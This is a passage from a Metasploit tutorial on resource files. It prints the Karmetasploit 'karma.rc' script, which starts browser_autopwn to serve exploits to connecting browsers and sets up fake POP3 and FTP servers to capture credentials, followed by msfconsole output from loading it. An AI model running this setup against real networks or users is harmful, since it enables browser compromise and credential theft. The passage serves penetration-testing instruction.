Resource Files
A resource file is simply a line separated text file containing a sequence of commands to be executed in msfconsole. One of the most notable resource files is the Karmetasploit file 'karma.rc'. Let's take a brief look inside this file to get an idea of the contents of a resource file.load db_sqlite3
db_create /root/karma.db
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
runAs you can see, passing a resource file to Metasploit allows for a great deal of automation. You can set any option and use any module within Metasploit using a resource file and the commands will all be executed in sequence.
There are two methods to load resource files in Metasploit. They can be passed as an option to msfconsole on the command line using the '-r' switch or you can load them from within msfconsole by using the 'resource' command.
root@bt4:/pentest/exploits/framework3# ./msfconsole -r karma.rc
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / _|/ _|/ / _| |
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
/|
|
=[ msf v3.3-dev
+ -- --=[ 372 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 149 aux
resource> load db_sqlite3msf > resource karma.rc
resource> load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new 'db_driver'
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db